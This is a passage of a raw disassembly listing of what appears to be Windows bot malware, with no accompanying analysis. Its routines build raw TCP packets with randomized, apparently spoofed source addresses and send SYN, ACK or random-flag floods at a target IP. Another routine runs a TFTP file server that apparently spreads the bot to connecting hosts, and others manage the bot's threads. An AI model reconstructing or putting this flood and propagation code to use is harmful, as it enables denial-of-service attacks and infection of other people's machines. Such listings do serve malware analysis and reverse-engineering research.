var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 13B0h
call sub_412DD0
mov eax, [ebp+arg_0]
and [ebp+var_BE0], 0
push ebx
push esi
push edi
mov ebx, ds:dword_41F004
mov esi, eax
push 6Ah
pop ecx
lea edi, [ebp+var_210]
rep movsd
xor esi, esi
inc esi
mov [eax+1A4h], esi
xor eax, eax
mov ecx, 1F3h
lea edi, [ebp+var_BDF]
rep stosd
stosw
stosb
call ebx ; GetTickCount
push eax
call sub_412D64
pop ecx
push 0FFh
push 3
push 2
call dword_4334A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jnz short loc_410535
call dword_433558 ; WSAGetLastError
push eax
lea eax, [ebp+var_410]
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
push eax
call sub_412BB5
xor esi, esi
add esp, 0Ch
cmp [ebp+var_70], esi
jnz short loc_410516
loc_4104F6: ; CODE XREF: sub_41046C+5B1�j
push esi
push [ebp+var_74]
lea eax, [ebp+var_410]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_210]
call sub_4045DD
add esp, 14h
loc_410516: ; CODE XREF: sub_41046C+88�j
; sub_41046C+5AB�j
lea eax, [ebp+var_410]
push eax
call sub_401C33
push [ebp+var_8C]
call sub_4111AE
pop ecx
pop ecx
push esi
jmp loc_4109DB
; ---------------------------------------------------------------------------
loc_410535: ; CODE XREF: sub_41046C+66�j
push 4
lea ecx, [ebp+var_38]
push ecx
push 2
xor edi, edi
push edi
push eax
mov [ebp+var_38], esi
call dword_4334BC ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_410578
call dword_433558 ; WSAGetLastError
push eax
lea eax, [ebp+var_410]
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
push eax
call sub_412BB5
add esp, 0Ch
loc_41056A: ; CODE XREF: sub_41046C+131�j
cmp [ebp+var_70], edi
jnz loc_4109C1
jmp loc_4109A1
; ---------------------------------------------------------------------------
loc_410578: ; CODE XREF: sub_41046C+E1�j
lea eax, [ebp+var_20C]
push eax
call dword_433514 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_41059F
lea eax, [ebp+var_410]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_41056A
; ---------------------------------------------------------------------------
loc_41059F: ; CODE XREF: sub_41046C+11C�j
xor eax, eax
lea edi, [ebp+var_48]
stosd
stosd
stosd
stosd
xor edi, edi
push edi
mov word ptr [ebp+var_48], 2
call dword_4335EC ; ntohs
mov word ptr [ebp+var_48+2], ax
lea eax, [ebp+var_20C]
push eax
call dword_433514 ; inet_addr
mov dword ptr [ebp+var_48+4], eax
mov [ebp+arg_0], edi
call ebx ; GetTickCount
mov [ebp+var_34], eax
mov [ebp+var_30], 45h
mov [ebp+var_2C], si
mov [ebp+var_2A], di
mov [ebp+var_27], 6
call ebx ; GetTickCount
sub eax, [ebp+var_34]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_7C]
ja loc_410956
and [ebp+var_60], 0
mov byte ptr [ebp+var_8], 50h
mov word ptr [ebp+var_8+6], di
mov [ebp+var_5F], 6
loc_41060A: ; CODE XREF: sub_41046C+4E4�j
call sub_412D71
cdq
mov ecx, 80h
idiv ecx
mov [ebp+var_26], di
add dl, cl
cmp [ebp+var_78], edi
mov [ebp+var_28], dl
jz short loc_41062C
call sub_410408
jmp short loc_41063F
; ---------------------------------------------------------------------------
loc_41062C: ; CODE XREF: sub_41046C+1B7�j
push [ebp+var_210]
call sub_406C33
pop ecx
push eax
call dword_433514 ; inet_addr
loc_41063F: ; CODE XREF: sub_41046C+1BE�j
cmp [ebp+var_80], edi
mov [ebp+var_24], eax
jz short loc_41066F
call sub_412D71
mov esi, eax
call sub_412D71
add eax, esi
cdq
idiv [ebp+var_80]
push dword ptr [ebp+var_48+4]
mov esi, edx
call dword_433570 ; ntohl
add eax, esi
push eax
call dword_4335C4 ; ntohl
jmp short loc_410672
; ---------------------------------------------------------------------------
loc_41066F: ; CODE XREF: sub_41046C+1D9�j
mov eax, dword ptr [ebp+var_48+4]
loc_410672: ; CODE XREF: sub_41046C+201�j
cmp [ebp+var_88], edi
mov [ebp+var_20], eax
jnz short loc_4106BE
call sub_412D71
mov esi, eax
inc esi
call sub_412D71
cdq
idiv esi
push ecx
push ecx
mov [ebp+var_1C], eax
fild [ebp+var_1C]
fstp [esp+8+var_8]
call sub_414670
pop ecx
pop ecx
call sub_414794
mov esi, eax
call sub_412D71
add eax, esi
cdq
mov ecx, 0FBFEh
idiv ecx
add edx, 401h
push edx
jmp short loc_4106C4
; ---------------------------------------------------------------------------
loc_4106BE: ; CODE XREF: sub_41046C+20F�j
push [ebp+var_88]
loc_4106C4: ; CODE XREF: sub_41046C+250�j
call dword_4335EC ; ntohs
cmp [ebp+var_84], edi
mov [ebp+var_12], ax
jnz short loc_410717
call sub_412D71
mov esi, eax
inc esi
call sub_412D71
cdq
idiv esi
push ecx
push ecx
mov [ebp+var_1C], eax
fild [ebp+var_1C]
fstp [esp+8+var_8]
call sub_414670
pop ecx
pop ecx
call sub_414794
mov esi, eax
call sub_412D71
add eax, esi
cdq
mov ecx, 0FBFEh
idiv ecx
add edx, 401h
push edx
jmp short loc_41071D
; ---------------------------------------------------------------------------
loc_410717: ; CODE XREF: sub_41046C+268�j
push [ebp+var_84]
loc_41071D: ; CODE XREF: sub_41046C+2A9�j
call dword_4335EC ; ntohs
mov [ebp+var_14], ax
call sub_412D71
cdq
mov esi, 100h
mov ecx, esi
idiv ecx
mov ebx, edx
shl ebx, 8
call sub_412D71
cdq
mov ecx, esi
idiv ecx
add ebx, edx
shl ebx, 8
call sub_412D71
cdq
mov ecx, esi
idiv ecx
add ebx, edx
shl ebx, 8
call sub_412D71
cdq
idiv esi
add ebx, edx
mov [ebp+var_10], ebx
call sub_412D71
shl eax, 1
cdq
mov ecx, 578h
idiv ecx
lea eax, [ebp+var_18C]
push offset aSyn_0 ; "syn"
push eax
mov ebx, edx
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_410797
mov [ebp+var_C], edi
mov byte ptr [ebp+var_8+1], 2
jmp short loc_410809
; ---------------------------------------------------------------------------
loc_410797: ; CODE XREF: sub_41046C+320�j
lea eax, [ebp+var_18C]
push offset aAck ; "ack"
push eax
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_4107C3
call sub_412D71
mov esi, eax
shl esi, 10h
call sub_412D71
mov byte ptr [ebp+var_8+1], 18h
jmp short loc_410804
; ---------------------------------------------------------------------------
loc_4107C3: ; CODE XREF: sub_41046C+340�j
lea eax, [ebp+var_18C]
push offset aRandom_0 ; "random"
push eax
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_410809
call sub_412D71
push 2
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_4107F1
mov byte ptr [ebp+var_8+1], cl
mov [ebp+var_C], edi
jmp short loc_410809
; ---------------------------------------------------------------------------
loc_4107F1: ; CODE XREF: sub_41046C+37B�j
mov byte ptr [ebp+var_8+1], 18h
call sub_412D71
mov esi, eax
shl esi, 10h
call sub_412D71
loc_410804: ; CODE XREF: sub_41046C+355�j
or esi, eax
mov [ebp+var_C], esi
loc_410809: ; CODE XREF: sub_41046C+329�j
; sub_41046C+36C�j ...
lea eax, [ebx+28h]
push eax
call dword_4335EC ; ntohs
push 2000h
mov [ebp+var_2E], ax
call dword_4335EC ; ntohs
mov word ptr [ebp+var_8+2], ax
mov eax, [ebp+var_24]
mov [ebp+var_68], eax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
lea eax, [ebx+14h]
push eax
mov word ptr [ebp+var_8+4], di
call dword_4335EC ; ntohs
mov [ebp+var_5E], ax
mov eax, ebx
cdq
sub eax, edx
mov esi, eax
sar esi, 1
cmp esi, edi
jle short loc_410863
loc_410851: ; CODE XREF: sub_41046C+3F5�j
call sub_412D71
mov [ebp+edi*2+var_13B0], ax
inc edi
cmp edi, esi
jl short loc_410851
loc_410863: ; CODE XREF: sub_41046C+3E3�j
push 5
pop ecx
push 8
lea esi, [ebp+var_14]
lea edi, [ebp+var_5C]
rep movsd
pop ecx
lea esi, [ebp+var_68]
lea edi, [ebp+var_BE0]
rep movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_13B0]
lea edi, [ebp+var_BC0]
rep movsd
mov ecx, eax
lea eax, [ebx+20h]
push eax
lea eax, [ebp+var_BE0]
and ecx, 3
push eax
rep movsb
call sub_406C89
push 5
pop ecx
push 5
mov word ptr [ebp+var_8+4], ax
lea esi, [ebp+var_30]
lea edi, [ebp+var_BE0]
rep movsd
pop ecx
lea esi, [ebp+var_14]
lea edi, [ebp+var_BCC]
rep movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_13B0]
lea edi, [ebp+var_BB8]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
lea edi, [ebp+ebx+var_BB8]
stosd
add ebx, 28h
lea eax, [ebp+var_BE0]
push ebx
push eax
call sub_406C89
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+var_26], ax
lea esi, [ebp+var_30]
lea edi, [ebp+var_BE0]
lea eax, [ebp+var_48]
push eax
rep movsd
xor esi, esi
push esi
push ebx
lea eax, [ebp+var_BE0]
push eax
push [ebp+var_18]
call dword_433470 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4109E1
inc [ebp+arg_0]
call ds:dword_41F004 ; GetTickCount
sub eax, [ebp+var_34]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edi, edi
cmp eax, [ebp+var_7C]
jbe loc_41060A
loc_410956: ; CODE XREF: sub_41046C+188�j
push [ebp+var_18]
call dword_4335AC ; closesocket
mov eax, [ebp+arg_0]
imul eax, 7D0h
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_7C]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_410]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_70], edi
jnz short loc_4109C1
loc_4109A1: ; CODE XREF: sub_41046C+107�j
push edi
push [ebp+var_74]
lea eax, [ebp+var_410]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_210]
call sub_4045DD
add esp, 14h
loc_4109C1: ; CODE XREF: sub_41046C+101�j
; sub_41046C+533�j
lea eax, [ebp+var_410]
push eax
call sub_401C33
push [ebp+var_8C]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_4109DB: ; CODE XREF: sub_41046C+C4�j
call ds:dword_41F014 ; ExitThread
loc_4109E1: ; CODE XREF: sub_41046C+4C4�j
push [ebp+var_18]
call dword_4335AC ; closesocket
call dword_433558 ; WSAGetLastError
push eax
push [ebp+arg_0]
lea eax, [ebp+var_20C]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+var_410]
push 200h
push eax
call sub_412E0D
add esp, 18h
cmp [ebp+var_70], esi
jnz loc_410516
jmp loc_4104F6
sub_41046C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410A22 proc near ; CODE XREF: sub_410A22:loc_410EDB�p
; DATA XREF: sub_401141+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 884h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, offset aOctet ; "octet"
lea edi, [ebp+74h+var_1C]
movsd
movsw
xor ebx, ebx
push ebx
xor eax, eax
inc eax
mov esi, edx
push 2
mov ecx, 0A9h
lea edi, [ebp+74h+var_37C]
rep movsd
inc [ebp+74h+var_16C]
push 2
mov [ebp+74h+var_10], eax
mov [edx+2A0h], eax
call dword_4334A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+74h+var_4], esi
jnz short loc_410ADE
push 190h
call ds:dword_41F000 ; Sleep
call dword_433558 ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+74h+var_E0], ebx
jnz short loc_410AC1
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4045DD
add esp, 14h
loc_410AC1: ; CODE XREF: sub_410A22+7D�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401C33
push [ebp+74h+var_170]
call sub_4111AE
pop ecx
jmp loc_410EC7
; ---------------------------------------------------------------------------
loc_410ADE: ; CODE XREF: sub_410A22+52�j
mov eax, [ebp+74h+var_170]
push [ebp+74h+var_168]
imul eax, 234h
mov dword_434344[eax], esi
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_44], 2
call dword_4335EC ; ntohs
mov [ebp+74h+var_42], ax
push 10h
lea eax, [ebp+74h+var_44]
push eax
push esi
mov [ebp+74h+var_40], ebx
call dword_433578 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_410B3D
push 1388h
call ds:dword_41F000 ; Sleep
dec [ebp+74h+var_16C]
push [ebp+74h+arg_0]
jmp loc_410EDB
; ---------------------------------------------------------------------------
loc_410B3D: ; CODE XREF: sub_410A22+100�j
lea eax, [ebp+74h+var_378]
push offset dword_41F968
push eax
call sub_413393
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+var_8], eax
jnz short loc_410BB6
push 190h
call ds:dword_41F000 ; Sleep
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax
call sub_412BB5
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4045DD
lea eax, [ebp+74h+var_780]
push eax
call sub_401C33
push [ebp+74h+var_170]
call sub_4111AE
add esp, 28h
jmp loc_410EC8
; ---------------------------------------------------------------------------
loc_410BB6: ; CODE XREF: sub_410A22+133�j
mov esi, 200h
loc_410BBB: ; CODE XREF: sub_410A22+471�j
mov edi, [ebp+74h+arg_0]
cmp [edi+2A0h], ebx
jz loc_410E9C
mov eax, [ebp+74h+var_4]
push 20h
pop ecx
mov [ebp+74h+var_880], eax
xor eax, eax
lea edi, [ebp+74h+var_D8]
rep stosd
lea eax, [ebp+74h+var_34]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_884]
push eax
push ebx
mov [ebp+74h+var_34], 5
mov [ebp+74h+var_30], 1388h
mov [ebp+74h+var_884], 1
call dword_433544 ; select
test eax, eax
jle loc_410E90
xor eax, eax
mov edx, 80h
mov [ebp+74h+var_580], bl
mov ecx, edx
lea edi, [ebp+74h+var_57F]
rep stosd
stosw
stosb
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push edx
lea eax, [ebp+74h+var_D8]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_C], 10h
call dword_433438 ; recvfrom
push [ebp+74h+var_28]
mov [ebp+74h+var_10], eax
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_58]
push eax
call sub_412BB5
cmp [ebp+74h+var_D8], bl
pop ecx
pop ecx
jnz loc_410E78
cmp [ebp+74h+var_D7], 1
jnz loc_410DD3
lea eax, [ebp+74h+var_274]
lea edx, [eax+1]
loc_410C7D: ; CODE XREF: sub_410A22+260�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_410C7D
sub eax, edx
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_274]
lea edi, [eax+1]
loc_410C92: ; CODE XREF: sub_410A22+275�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_410C92
sub eax, edi
push eax
lea eax, [ebp+74h+var_D6]
push eax
lea eax, [ebp+74h+var_274]
push eax
call sub_414380
add esp, 0Ch
test eax, eax
jnz loc_410D91
lea eax, [ebp+74h+var_1C]
lea edx, [eax+1]
loc_410CBD: ; CODE XREF: sub_410A22+2A0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_410CBD
sub eax, edx
push eax
mov eax, [ebp+74h+var_14]
lea eax, [ebp+eax+74h+var_D5]
push eax
lea eax, [ebp+74h+var_1C]
push eax
call sub_414380
add esp, 0Ch
test eax, eax
jnz loc_410D91
push ebx
push ebx
push [ebp+74h+var_8]
call sub_414898
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
mov [ebp+74h+var_57E], bl
mov [ebp+74h+var_57D], 1
call sub_41313E
add esp, 1Ch
push [ebp+74h+var_C]
lea ecx, [ebp+74h+var_2C]
push ecx
mov [ebp+74h+var_10], eax
push ebx
add eax, 4
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
call dword_433470 ; sendto
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTransf ; "[TFTP]: File transfer started to IP: %s"...
loc_410D4B: ; CODE XREF: sub_410A22+451�j
lea eax, [ebp+74h+var_780]
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+74h+var_E0], ebx
jnz short loc_410D7F
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4045DD
add esp, 14h
loc_410D7F: ; CODE XREF: sub_410A22+33B�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401C33
pop ecx
jmp loc_410E90
; ---------------------------------------------------------------------------
loc_410D91: ; CODE XREF: sub_410A22+28F�j
; sub_410A22+2BB�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 13h
push offset dword_42734C
push [ebp+74h+var_4]
call dword_433470 ; sendto
lea eax, [ebp+74h+var_274]
push eax
lea eax, [ebp+74h+var_58]
push eax
lea eax, [ebp+74h+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax
call sub_412BB5
lea eax, [ebp+74h+var_D8]
push eax
call sub_401C33
add esp, 14h
jmp loc_410E90
; ---------------------------------------------------------------------------
loc_410DD3: ; CODE XREF: sub_410A22+24C�j
cmp [ebp+74h+var_D7], 4
jnz loc_410E78
mov cl, [ebp+74h+var_D5]
cmp cl, 0FFh
mov al, [ebp+74h+var_D6]
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
jnz short loc_410E01
inc al
xor cl, cl
mov [ebp+74h+var_57D], bl
jmp short loc_410E09
; ---------------------------------------------------------------------------
loc_410E01: ; CODE XREF: sub_410A22+3D1�j
inc cl
mov [ebp+74h+var_57D], cl
loc_410E09: ; CODE XREF: sub_410A22+3DD�j
mov [ebp+74h+var_57E], al
movzx eax, al
shl eax, 8
movzx ecx, cl
add eax, ecx
shl eax, 9
push ebx
sub eax, esi
push eax
push [ebp+74h+var_8]
call sub_414898
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
call sub_41313E
add esp, 1Ch
push [ebp+74h+var_C]
mov edi, eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
lea eax, [edi+4]
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_10], edi
call dword_433470 ; sendto
cmp edi, ebx
jnz short loc_410E90
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTran_0 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_410D4B
; ---------------------------------------------------------------------------
loc_410E78: ; CODE XREF: sub_410A22+242�j
; sub_410A22+3B5�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 9
push offset dword_4272EC
push [ebp+74h+var_4]
call dword_433470 ; sendto
loc_410E90: ; CODE XREF: sub_410A22+1E9�j
; sub_410A22+36A�j ...
cmp [ebp+74h+var_10], ebx
jg loc_410BBB
mov edi, [ebp+74h+arg_0]
loc_410E9C: ; CODE XREF: sub_410A22+1A2�j
push [ebp+74h+var_4]
call dword_4335AC ; closesocket
push [ebp+74h+var_8]
call sub_412F93
dec [ebp+74h+var_16C]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_410ECF
push [ebp+74h+var_170]
call sub_4111AE
loc_410EC7: ; CODE XREF: sub_410A22+B7�j
pop ecx
loc_410EC8: ; CODE XREF: sub_410A22+18F�j
push ebx
call ds:dword_41F014 ; ExitThread
loc_410ECF: ; CODE XREF: sub_410A22+498�j
push 3E8h
call ds:dword_41F000 ; Sleep
push edi
loc_410EDB: ; CODE XREF: sub_410A22+116�j
call sub_410A22
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_410A22 endp
; =============== S U B R O U T I N E =======================================
sub_410EEA proc near ; CODE XREF: sub_401141+F0�p
; sub_401141+23D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_434138
loc_410EF2: ; CODE XREF: sub_410EEA+18�j
cmp byte ptr [eax], 0
jz short loc_410F06
add eax, 234h
inc edi
cmp eax, offset dword_478EC8
jl short loc_410EF2
jmp short loc_410F51
; ---------------------------------------------------------------------------
loc_410F06: ; CODE XREF: sub_410EEA+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_434138[esi]
push eax
call sub_412C40
mov eax, [esp+14h+arg_4]
and dword_43433C[esi], 0
and dword_434340[esi], 0
mov dword_434338[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte_434350[esi], 0
mov dword_434344[esi], eax
pop esi
loc_410F51: ; CODE XREF: sub_410EEA+1A�j
mov eax, edi
pop edi
retn
sub_410EEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F55 proc near ; CODE XREF: sub_4111EB+31�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
xor edi, edi
mov esi, offset dword_434138
loc_410F7F: ; CODE XREF: sub_410F55+78�j
cmp byte ptr [esi], 0
jz short loc_410FC0
cmp [ebp+arg_C], 0
jnz short loc_410F93
cmp dword ptr [esi+204h], 0
jnz short loc_410FC0
loc_410F93: ; CODE XREF: sub_410F55+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
loc_410FC0: ; CODE XREF: sub_410F55+2D�j
; sub_410F55+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_478EC8
jl short loc_410F7F
pop edi
pop esi
leave
retn
sub_410F55 endp
; =============== S U B R O U T I N E =======================================
sub_410FD3 proc near ; CODE XREF: sub_4078FA+38DC�p
; sub_41105B+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_411055
cmp esi, 1F4h
jge short loc_411055
imul esi, 234h
push edi
push ebx
lea edi, dword_43434C[esi]
push dword ptr [edi]
call ds:dword_41F0C8 ; TerminateThread
cmp [edi], ebx
jz short loc_411005
inc ebp
loc_411005: ; CODE XREF: sub_410FD3+2F�j
mov [edi], ebx
lea edi, dword_434340[esi]
mov eax, [edi]
cmp eax, ebx
mov dword_434338[esi], ebx
mov dword_43433C[esi], ebx
jbe short loc_411026
push eax
call sub_4074C6
pop ecx
loc_411026: ; CODE XREF: sub_410FD3+4A�j
mov [edi], ebx
lea edi, dword_434344[esi]
push dword ptr [edi]
mov byte ptr dword_434138[esi], bl
mov byte_434350[esi], bl
call dword_4335AC ; closesocket
lea esi, dword_434348[esi]
push dword ptr [esi]
mov [edi], ebx
call dword_4335AC ; closesocket
mov [esi], ebx
pop edi
loc_411055: ; CODE XREF: sub_410FD3+D�j
; sub_410FD3+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_410FD3 endp
; =============== S U B R O U T I N E =======================================
sub_41105B proc near ; CODE XREF: sub_402795+18�p
; sub_4078FA+3895�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_434138
loc_411067: ; CODE XREF: sub_41105B+2A�j
cmp byte ptr [esi], 0
jz short loc_411078
push edi
call sub_410FD3
test eax, eax
pop ecx
jz short loc_411078
inc ebx
loc_411078: ; CODE XREF: sub_41105B+F�j
; sub_41105B+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_478EC8
jl short loc_411067
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_41105B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41108D proc near ; CODE XREF: sub_411120+1D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43433C
loc_4110A1: ; CODE XREF: sub_41108D+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_4110C3
test edi, edi
jle short loc_4110B5
cmp [esi], edi
jz short loc_4110B5
cmp ebx, edi
jnz short loc_4110C3
loc_4110B5: ; CODE XREF: sub_41108D+1E�j
; sub_41108D+22�j
push ebx
call sub_410FD3
test eax, eax
pop ecx
jz short loc_4110C3
inc [ebp+var_4]
loc_4110C3: ; CODE XREF: sub_41108D+1A�j
; sub_41108D+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4790CC
jl short loc_4110A1
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41108D endp
; =============== S U B R O U T I N E =======================================
sub_4110DA proc near ; CODE XREF: sub_4010CA+B�p
; sub_401141+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_434338
loc_4110E1: ; CODE XREF: sub_4110DA+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_4110EA
inc eax
loc_4110EA: ; CODE XREF: sub_4110DA+D�j
add ecx, 234h
cmp ecx, offset dword_4790C8
jl short loc_4110E1
retn
sub_4110DA endp
; =============== S U B R O U T I N E =======================================
sub_4110F9 proc near ; CODE XREF: sub_4078FA+4139�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_434338
push esi
loc_411103: ; CODE XREF: sub_4110F9+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_41111C
add ecx, 234h
inc edx
cmp ecx, offset dword_4790C8
jl short loc_411103
pop esi
retn
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_4110F9+10�j
mov eax, edx
pop esi
retn
sub_4110F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411120 proc near ; CODE XREF: sub_4078FA+1EA8�p
; sub_4078FA+4863�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_411139
push [ebp+arg_1C]
call sub_412F42
pop ecx
loc_411139: ; CODE XREF: sub_411120+E�j
push eax
push [ebp+arg_18]
call sub_41108D
test eax, eax
pop ecx
pop ecx
jle short loc_411165
push eax
push [ebp+arg_14]
lea eax, [ebp+var_200]
